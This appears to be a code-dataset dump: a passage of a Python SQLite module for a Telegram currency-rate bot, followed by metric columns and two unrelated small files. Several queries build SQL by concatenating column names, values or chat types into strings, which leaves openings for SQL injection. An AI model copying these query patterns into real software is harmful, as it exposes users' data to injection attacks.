exchangeRates FLOAT
);
""")
with con:
con.execute("""
CREATE TABLE SettingsCryptoRates (
chatID INTEGER NOT NULL PRIMARY KEY,
ADA INTEGER DEFAULT 0,
BCH INTEGER DEFAULT 0,
BNB INTEGER DEFAULT 0,
BTC INTEGER DEFAULT 1,
DASH INTEGER DEFAULT 0,
DOGE INTEGER DEFAULT 0,
ETC INTEGER DEFAULT 0,
ETH INTEGER DEFAULT 1,
LTC INTEGER DEFAULT 0,
RVN INTEGER DEFAULT 0,
TRX INTEGER DEFAULT 0,
XLM INTEGER DEFAULT 0,
XMR INTEGER DEFAULT 0,
XRP INTEGER DEFAULT 0
);
""")
with con:
con.execute("""
CREATE TABLE SettingsExchangeRates (
chatID INTEGER NOT NULL PRIMARY KEY ,
_AED INTEGER DEFAULT 0,
_AFN INTEGER DEFAULT 0,
_ALL INTEGER DEFAULT 0,
_AMD INTEGER DEFAULT 0,
_ANG INTEGER DEFAULT 0,
_AOA INTEGER DEFAULT 0,
_ARS INTEGER DEFAULT 0,
_AUD INTEGER DEFAULT 0,
_AWG INTEGER DEFAULT 0,
_AZN INTEGER DEFAULT 0,
_BAM INTEGER DEFAULT 0,
_BBD INTEGER DEFAULT 0,
_BDT INTEGER DEFAULT 0,
_BGN INTEGER DEFAULT 0,
_BHD INTEGER DEFAULT 0,
_BIF INTEGER DEFAULT 0,
_BMD INTEGER DEFAULT 0,
_BND INTEGER DEFAULT 0,
_BOB INTEGER DEFAULT 0,
_BRL INTEGER DEFAULT 0,
_BSD INTEGER DEFAULT 0,
_BTN INTEGER DEFAULT 0,
_BWP INTEGER DEFAULT 0,
_BYN INTEGER DEFAULT 0,
_BZD INTEGER DEFAULT 0,
_CAD INTEGER DEFAULT 0,
_CDF INTEGER DEFAULT 0,
_CHF INTEGER DEFAULT 0,
_CLF INTEGER DEFAULT 0,
_CLP INTEGER DEFAULT 0,
_CNY INTEGER DEFAULT 0,
_COP INTEGER DEFAULT 0,
_CRC INTEGER DEFAULT 0,
_CUC INTEGER DEFAULT 0,
_CUP INTEGER DEFAULT 0,
_CVE INTEGER DEFAULT 0,
_CZK INTEGER DEFAULT 0,
_DJF INTEGER DEFAULT 0,
_DKK INTEGER DEFAULT 0,
_DOP INTEGER DEFAULT 0,
_DZD INTEGER DEFAULT 0,
_EGP INTEGER DEFAULT 0,
_ERN INTEGER DEFAULT 0,
_ETB INTEGER DEFAULT 0,
_EUR INTEGER DEFAULT 1,
_FJD INTEGER DEFAULT 0,
_FKP INTEGER DEFAULT 0,
_GBP INTEGER DEFAULT 1,
_GEL INTEGER DEFAULT 0,
_GGP INTEGER DEFAULT 0,
_GHS INTEGER DEFAULT 0,
_GIP INTEGER DEFAULT 0,
_GMD INTEGER DEFAULT 0,
_GNF INTEGER DEFAULT 0,
_GTQ INTEGER DEFAULT 0,
_GYD INTEGER DEFAULT 0,
_HKD INTEGER DEFAULT 0,
_HNL INTEGER DEFAULT 0,
_HRK INTEGER DEFAULT 0,
_HTG INTEGER DEFAULT 0,
_HUF INTEGER DEFAULT 0,
_IDR INTEGER DEFAULT 0,
_ILS INTEGER DEFAULT 0,
_IMP INTEGER DEFAULT 0,
_INR INTEGER DEFAULT 0,
_IQD INTEGER DEFAULT 0,
_IRR INTEGER DEFAULT 0,
_ISK INTEGER DEFAULT 0,
_JEP INTEGER DEFAULT 0,
_JMD INTEGER DEFAULT 0,
_JOD INTEGER DEFAULT 0,
_JPY INTEGER DEFAULT 0,
_KES INTEGER DEFAULT 0,
_KGS INTEGER DEFAULT 0,
_KHR INTEGER DEFAULT 0,
_KMF INTEGER DEFAULT 0,
_KPW INTEGER DEFAULT 0,
_KRW INTEGER DEFAULT 0,
_KWD INTEGER DEFAULT 0,
_KYD INTEGER DEFAULT 0,
_KZT INTEGER DEFAULT 0,
_LAK INTEGER DEFAULT 0,
_LBP INTEGER DEFAULT 0,
_LKR INTEGER DEFAULT 0,
_LRD INTEGER DEFAULT 0,
_LSL INTEGER DEFAULT 0,
_LTL INTEGER DEFAULT 0,
_LVL INTEGER DEFAULT 0,
_LYD INTEGER DEFAULT 0,
_MAD INTEGER DEFAULT 0,
_MDL INTEGER DEFAULT 0,
_MGA INTEGER DEFAULT 0,
_MKD INTEGER DEFAULT 0,
_MMK INTEGER DEFAULT 0,
_MNT INTEGER DEFAULT 0,
_MOP INTEGER DEFAULT 0,
_MRO INTEGER DEFAULT 0,
_MUR INTEGER DEFAULT 0,
_MVR INTEGER DEFAULT 0,
_MWK INTEGER DEFAULT 0,
_MXN INTEGER DEFAULT 0,
_MYR INTEGER DEFAULT 0,
_MZN INTEGER DEFAULT 0,
_NAD INTEGER DEFAULT 0,
_NGN INTEGER DEFAULT 0,
_NIO INTEGER DEFAULT 0,
_NOK INTEGER DEFAULT 0,
_NPR INTEGER DEFAULT 0,
_NZD INTEGER DEFAULT 0,
_OMR INTEGER DEFAULT 0,
_PAB INTEGER DEFAULT 0,
_PEN INTEGER DEFAULT 0,
_PGK INTEGER DEFAULT 0,
_PHP INTEGER DEFAULT 0,
_PKR INTEGER DEFAULT 0,
_PLN INTEGER DEFAULT 0,
_PYG INTEGER DEFAULT 0,
_QAR INTEGER DEFAULT 0,
_RON INTEGER DEFAULT 0,
_RSD INTEGER DEFAULT 0,
_RUB INTEGER DEFAULT 1,
_RWF INTEGER DEFAULT 0,
_SAR INTEGER DEFAULT 0,
_SBD INTEGER DEFAULT 0,
_SCR INTEGER DEFAULT 0,
_SDG INTEGER DEFAULT 0,
_SEK INTEGER DEFAULT 0,
_SGD INTEGER DEFAULT 0,
_SHP INTEGER DEFAULT 0,
_SLL INTEGER DEFAULT 0,
_SOS INTEGER DEFAULT 0,
_SRD INTEGER DEFAULT 0,
_SVC INTEGER DEFAULT 0,
_SYP INTEGER DEFAULT 0,
_SZL INTEGER DEFAULT 0,
_THB INTEGER DEFAULT 0,
_TJS INTEGER DEFAULT 0,
_TMT INTEGER DEFAULT 0,
_TND INTEGER DEFAULT 0,
_TOP INTEGER DEFAULT 0,
_TRY INTEGER DEFAULT 0,
_TTD INTEGER DEFAULT 0,
_TWD INTEGER DEFAULT 0,
_TZS INTEGER DEFAULT 0,
_UAH INTEGER DEFAULT 1,
_UGX INTEGER DEFAULT 0,
_USD INTEGER DEFAULT 1,
_UYU INTEGER DEFAULT 0,
_UZS INTEGER DEFAULT 0,
_VEF INTEGER DEFAULT 0,
_VND INTEGER DEFAULT 0,
_VUV INTEGER DEFAULT 0,
_WST INTEGER DEFAULT 0,
_XAF INTEGER DEFAULT 0,
_XAG INTEGER DEFAULT 0,
_XAU INTEGER DEFAULT 0,
_XCD INTEGER DEFAULT 0,
_XOF INTEGER DEFAULT 0,
_XPF INTEGER DEFAULT 0,
_YER INTEGER DEFAULT 0,
_ZAR INTEGER DEFAULT 0,
_ZMW INTEGER DEFAULT 0,
_ZWL INTEGER DEFAULT 0
);
""")
con.close()
Print("Main DB is created.", "S")
def AddID(chatID: str, chatType: str):
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute(
"INSERT OR IGNORE INTO SettingsExchangeRates (chatID) values (?)", tuple([chatID]))
cursor.execute(
"INSERT OR IGNORE INTO SettingsCryptoRates (chatID) values (?)", tuple([chatID]))
if chatType == "group" or chatType == "supergroup":
cursor.execute(
"INSERT OR IGNORE INTO SettingsGroups (chatID) values (?)", tuple([chatID]))
else:
cursor.execute(
"INSERT OR IGNORE INTO SettingsPrivateChats (chatID) values (?)", tuple([chatID]))
con.commit()
def SetSetting(chatID: str, key: str, val: str, chatType: str):
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
try:
if chatType == "group" or chatType == "supergroup":
cursor.execute("UPDATE OR ABORT SettingsGroups SET "+str(key)+" = ? WHERE chatID = ?", (val, chatID))
else:
cursor.execute("UPDATE OR ABORT SettingsPrivateChats SET "+str(key)+" = ? WHERE chatID = ?", (val, chatID))
con.commit()
except:
Print("No such column. Cannot find '" + str(key) + "'. Error in 'SetSetting'.", "E")
def SetCurrencySetting(chatID: str, currency: str, val: str):
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
try:
cursor.execute("UPDATE OR ABORT SettingsExchangeRates SET " + "_"+str(currency)+"= "+str(val)+" WHERE chatID = "+str(chatID))
con.commit()
except:
Print("No such column. Cannot find '" + str(currency) + "'. Error in 'SetCurrencySetting'.", "E")
def ReverseCurrencySetting(chatID: str, currency: str):
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
try:
cursor.execute("SELECT "+ "_"+str(currency) + " from SettingsExchangeRates WHERE chatID = "+str(chatID))
res = cursor.fetchone()
cursor.execute("UPDATE OR ABORT SettingsExchangeRates SET " + "_"+str(currency)+"= "+str(int(not res[0]))+" WHERE chatID = "+str(chatID))
con.commit()
except:
try:
cursor.execute("SELECT "+str(currency) + " from SettingsCryptoRates WHERE chatID = "+str(chatID))
res = cursor.fetchone()
cursor.execute("UPDATE OR ABORT SettingsCryptoRates SET " + str(currency)+"= "+str(int(not res[0]))+" WHERE chatID = "+str(chatID))
con.commit()
except:
Print("No such column. Cannot find '" + str(currency) + "'. Error in 'ReverseCurrencySetting'.", "E")
def SetCryptoSetting(chatID: str, crypto: str, val: str):
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
try:
cursor.execute("UPDATE OR ABORT SettingsCryptoRates SET " +str(crypto)+"= "+str(val)+" WHERE chatID = "+str(chatID))
con.commit()
except:
Print("No such column. Cannot find '" + str(crypto) + "'. Error in 'SetCryptoSetting'.", "E")
def GetAllSettings(chatID: str, chatType: str) -> dict:
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
con.row_factory = sql.Row
cursor = con.cursor()
try:
if chatType == "group" or chatType == "supergroup":
cursor.execute(
"SELECT * from SettingsGroups WHERE chatID = "+str(chatID))
res = cursor.fetchone()
else:
cursor.execute(
"SELECT * from SettingsPrivateChats WHERE chatID = "+str(chatID))
res = cursor.fetchone()
return dict(res)
except:
Print("No such column. Cannot find '" + str(chatID) + "'. Error in 'GetAllSettings'.", "E")
return None
def GetSetting(chatID: str, key: str, chatType: str) -> str:
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
try:
if chatType == "group" or chatType == "supergroup":
cursor.execute("SELECT "+str(key) +
" from SettingsGroups WHERE chatID = "+str(chatID))
res = cursor.fetchone()
else:
cursor.execute(
"SELECT "+str(key)+" from SettingsPrivateChats WHERE chatID = "+str(chatID))
res = cursor.fetchone()
return res[0]
except:
Print("No such column. Cannot find '" + str(key) + "'. Error in 'GetSetting'.", "E")
return None
def GetAllCurrencies(chatID: str) -> list:
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
con.row_factory = sql.Row
cursor = con.cursor()
try:
cursor.execute(
"SELECT * FROM SettingsExchangeRates WHERE chatID = "+str(chatID))
res = dict(cursor.fetchone())
return [k[1:] for k, v in res.items() if v == 1]
except:
Print("No such column. Cannot find '" + str(chatID) + "'. Error in 'GetAllCurrencies'.", "E")
return None
def GetAllCrypto(chatID: str) -> list:
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
con.row_factory = sql.Row
cursor = con.cursor()
try:
cursor.execute(
"SELECT * FROM SettingsCryptoRates WHERE chatID = "+str(chatID))
res = dict(cursor.fetchone())
return [k for k, v in res.items() if v == 1]
except:
Print("No such column. Cannot find '" + str(chatID) + "'. Error in 'GetAllCrypto'.", "E")
return None
def ChatExists(chatID: str) -> int:
chatID = int(chatID)
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT EXISTS(SELECT 1 FROM SettingsExchangeRates WHERE chatID = "+str(chatID)+")")
res = cursor.fetchone()
return res[0]
def IsBlacklisted(userID: str) -> int:
userID = int(userID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT EXISTS(SELECT 1 FROM BlackList WHERE userID = "+str(userID)+")")
res = cursor.fetchone()
return res[0]
def ClearBlacklist(userID: str):
userID = int(userID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
if userID == 0:
cursor.execute("DELETE FROM BlackList")
con.commit()
cursor.execute("VACUUM")
con.commit()
return 1
else:
try:
cursor.execute("DELETE FROM BlackList WHERE userID = "+str(userID))
con.commit()
return 1
except:
Print("No such column. Cannot find '" + str(userID) + "'. Error in 'ClearBlacklist'.", "E")
return None
def AddBlacklist(userID: str, chatID: str = 0, chatName: str = ""):
chatID = int(chatID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute("INSERT OR IGNORE INTO BlackList (userID,chatID,chatName,banDate) values (?,?,?,DATETIME())", tuple(
[userID, chatID, chatName]))
con.commit()
def GetBlacklist() -> list:
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * from BlackList")
res = cursor.fetchall()
return [k[0] for k in res]
def GetAdmins() -> list:
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * from AdminsList")
res = cursor.fetchall()
return [k[0] for k in res]
def IsAdmin(adminID: str) -> int:
adminID = int(adminID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT EXISTS(SELECT 1 FROM AdminsList WHERE adminID = "+str(adminID)+")")
res = cursor.fetchone()
return res[0]
def AddAdmin(adminID: str):
adminID = int(adminID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute(
"INSERT OR IGNORE INTO AdminsList (adminID) values ("+str(adminID)+")")
con.commit()
def ClearAdmins(adminID: str):
adminID = int(adminID)
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
if adminID == 0:
cursor.execute("DELETE FROM AdminsList")
con.commit()
return 1
else:
try:
cursor.execute(
"DELETE FROM AdminsList WHERE adminID = "+str(adminID))
con.commit()
return 1
except:
Print("No such adminID. Cannot find '" + str(adminID) + "'. Error in 'ClearAdmins'.", "E")
return None
def GetListOfCurrencies() -> list:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.execute("SELECT * FROM SettingsExchangeRates")
names = [description[0] for description in cursor.description]
names.pop(0)
return [i[1:] for i in names]
def GetListOfCrypto() -> list:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.execute("SELECT * FROM SettingsCryptoRates")
names = [description[0] for description in cursor.description]
names.pop(0)
return [i[0:] for i in names]
def UpdateExchangeRatesDB(exchangeRates: dict):
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
f = open("Dictionaries/currencies.json", encoding="utf-8")
data = json.load(f)
for cur, rate in exchangeRates.items():
flag = next(
(item for item in data['currencies'] if item['code'] == cur), None)
try:
cursor.execute("INSERT OR REPLACE INTO ExchangeRates (currency,flag,exchangeRates) values ('" +
cur+"','"+flag["emoji"]+"',?)", tuple([rate]))
except:
continue
con.commit()
def UpdateCryptoRatesDB(cryptoRates: dict):
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
f = open("Dictionaries/currencies.json", encoding="utf-8")
data = json.load(f)
for cur, rate in cryptoRates.items():
cursor.execute("INSERT OR REPLACE INTO CryptoRates (currency,flag,exchangeRates) values ('" +cur+"','"+""+"',?)", tuple([rate]))
con.commit()
def AddIDStats(chatID: str, chatType: str):
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
cursor.execute("INSERT OR IGNORE INTO ChatsUsage (chatID, chatType, timeAdded, lastTimeUse) values (" +
str(chatID)+",'"+chatType+"',DATETIME(),DATETIME())")
con.commit()
def UpdateChatUsage(chatID: str):
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
cursor.execute(
"UPDATE ChatsUsage SET lastTimeUse = DATETIME() WHERE chatID = "+str(chatID))
con.commit()
def GetChatsAmount() -> dict:
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private'")
res = {}
res['private'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'group' OR chatType = 'supergroup'")
res['groups'] = cursor.fetchone()[0]
return res
def GetGroupChatIDs() -> list:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * from SettingsGroups")
res = cursor.fetchall()
return [k[0] for k in res]
def GetPrivateChatIDs() -> list:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * from SettingsPrivateChats")
res = cursor.fetchall()
return [k[0] for k in res]
def GetSetTimeStats() -> dict:
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private'")
res = {}
res['private'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'group' OR chatType = 'supergroup'")
res['groups'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private' AND lastTimeUse > datetime('now', '-7 days')")
res['activePrivateWeek'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE (chatType = 'group' OR chatType ='supergroup' ) AND lastTimeUse > datetime('now', '-7 days')")
res['activeGroupsWeek'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private' AND lastTimeUse > datetime('now', '-1 month')")
res['activePrivateMonth'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE (chatType = 'group' OR chatType ='supergroup' ) AND lastTimeUse > datetime('now', '-1 month')")
res['activeGroupsMonth'] = cursor.fetchone()[0]
cursor.execute("INSERT INTO ChatsTimeStats (date,privateChatsAmount,groupChatsAmount,activeWeekPrivateChats,activeWeekGroupChats,activeMonthPrivateChats,activeMonthGroupChats) values (DATETIME(),?,?,?,?,?,?)", tuple(res.values()))
con.commit()
return res
def GetTimeStats() -> dict:
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private'")
res = {}
res['private'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'group' OR chatType = 'supergroup'")
res['groups'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private' AND lastTimeUse > datetime('now', '-7 days')")
res['activePrivateWeek'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE (chatType = 'group' OR chatType ='supergroup' ) AND lastTimeUse > datetime('now', '-7 days')")
res['activeGroupsWeek'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private' AND lastTimeUse > datetime('now', '-1 month')")
res['activePrivateMonth'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE (chatType = 'group' OR chatType ='supergroup' ) AND lastTimeUse > datetime('now', '-1 month')")
res['activeGroupsMonth'] = cursor.fetchone()[0]
return res
def ProcessedCurrency(chatID: str, userID: str, processedCurrency: str, message: str):
values_q = [chatID, userID, processedCurrency, message]
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
query = "INSERT INTO ProcessedCurrencies (date, chatID, userID, proccesedCurrency ,message"
turnedOnCurrencies = GetAllCurrencies(chatID) + GetAllCrypto(chatID)
try:
turnedOnCurrencies.remove(processedCurrency)
except:
pass
for cur in turnedOnCurrencies:
query = query + ", _" + cur
values_q.append(1)
query = query+") values (DATETIME(), ?,?,?,?"
for cur in turnedOnCurrencies:
query = query + ",?"
query = query+")"
cursor.execute(query, tuple(values_q))
con.commit()
def GetDictOfFlags() -> dict:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * FROM ExchangeRates")
res = cursor.fetchall()
res_dict = {}
for i in res:
res_dict[i[0]] = i[1]
return res_dict
def GetExchangeRates() -> dict:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * FROM ExchangeRates")
res = cursor.fetchall()
res_dict = {}
for i in res:
res_dict[i[0]] = i[2]
return res_dict
def GetCryptoRates() -> dict:
con = sql.connect('DataBases/DataForBot.sqlite')
cursor = con.cursor()
cursor.execute("SELECT * FROM CryptoRates")
res = cursor.fetchall()
res_dict = {}
for i in res:
res_dict[i[0]] = i[2]
return res_dict
def GetStatsInPeriod(days: int) -> dict:
con = sql.connect('DataBases/StatsData.sqlite')
cursor = con.cursor()
res = {}
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE chatType = 'private' AND lastTimeUse > datetime('now', '-"+str(days)+" days')")
res['activePrivate'] = cursor.fetchone()[0]
cursor.execute(
"SELECT COUNT(*) FROM ChatsUsage WHERE (chatType = 'group' OR chatType ='supergroup' ) AND lastTimeUse > datetime('now', '-"+str(days)+" days')")
res['activeGroups'] = cursor.fetchone()[0]
return res
def AddReport(chatID: str, userID: str, message: str, reply: str = ""):
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute("INSERT INTO Reports (date,chatID,userID,message,reply) values (DATETIME(),?,?,?,?)", tuple(
[chatID, userID, message, reply]))
con.commit()
def ClearReports():
con = sql.connect('DataBases/ServiceData.sqlite')
cursor = con.cursor()
cursor.execute("DELETE FROM Reports")
con.commit()
cursor.execute("VACUUM")
con.commit() | 36.771481 | 234 | 0.558342 | 4,195 | 40,228 | 5.267938 | 0.105364 | 0.232499 | 0.24164 | 0.041812 | 0.784425 | 0.7656 | 0.729671 | 0.705371 | 0.691117 | 0.679035 | 0 | 0.016677 | 0.347121 | 40,228 | 1,094 | 235 | 36.771481 | 0.824741 | 0.003107 | 0 | 0.742424 | 0 | 0.013131 | 0.617443 | 0.052923 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042424 | false | 0.005051 | 0.008081 | 0 | 0.081818 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f89efb81a5a1cce1aeb9603926bf199d5c98cb49 | 1,852 | py | Python | cknet/initializers.py | kingcong/cknet | 4d444478891fe456ed144609dd24243030b75ee3 | [
"MIT"
] | 2 | 2017-12-26T12:14:12.000Z | 2020-02-13T20:33:26.000Z | cknet/initializers.py | kingcong/CKNet | 4d444478891fe456ed144609dd24243030b75ee3 | [
"MIT"
] | 1 | 2018-01-01T12:54:22.000Z | 2018-01-01T12:54:22.000Z | cknet/initializers.py | kingcong/CKNet | 4d444478891fe456ed144609dd24243030b75ee3 | [
"MIT"
] | 1 | 2017-12-25T03:28:49.000Z | 2017-12-25T03:28:49.000Z | import numpy as np
class Initializer():
def fill(self, layer_dims):
raise NotImplementedError()
class RandomInit(Initializer):
def fill(self, layer_dims):
np.random.seed(1)
parameters = {}
L = len(layer_dims) # number of layers in the network
for l in range(1, L):
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * 0.01
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
class HeInit(Initializer):
def fill(self, layer_dims):
np.random.seed(1)
parameters = {}
L = len(layer_dims) # number of layers in the network
for l in range(1, L):
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(2 / layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
class XavierInit(Initializer):
def fill(self, layer_dims):
np.random.seed(1)
parameters = {}
L = len(layer_dims) # number of layers in the network
for l in range(1, L):
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(1 / layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
| 34.296296 | 121 | 0.564795 | 263 | 1,852 | 3.874525 | 0.159696 | 0.238469 | 0.196271 | 0.151129 | 0.921492 | 0.921492 | 0.89107 | 0.89107 | 0.89107 | 0.89107 | 0 | 0.018491 | 0.269978 | 1,852 | 53 | 122 | 34.943396 | 0.735207 | 0.051296 | 0 | 0.756757 | 0 | 0 | 0.006845 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 1 | 0.108108 | false | 0 | 0.027027 | 0 | 0.324324 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3e1f994073bb048c51ce5fa625ce2a20fc0cf777 | 145 | py | Python | neuralcode/tokenizers/__init__.py | neuralcode/neuralcode | bf03523fed0240477e153ee2beb319f0594e4095 | [
"MIT"
] | 5 | 2021-02-23T22:54:34.000Z | 2021-02-25T15:07:54.000Z | neuralcode/tokenizers/__init__.py | neuralcode/neuralcode | bf03523fed0240477e153ee2beb319f0594e4095 | [
"MIT"
] | null | null | null | neuralcode/tokenizers/__init__.py | neuralcode/neuralcode | bf03523fed0240477e153ee2beb319f0594e4095 | [
"MIT"
] | null | null | null | from .tokenizers import Tokenizer # NOQA
from .tokenizers import TransformerTokenizer # NOQA
from .tokenizers import PygmentsTokenizer # NOQA
| 36.25 | 52 | 0.813793 | 15 | 145 | 7.866667 | 0.466667 | 0.355932 | 0.508475 | 0.40678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144828 | 145 | 3 | 53 | 48.333333 | 0.951613 | 0.096552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.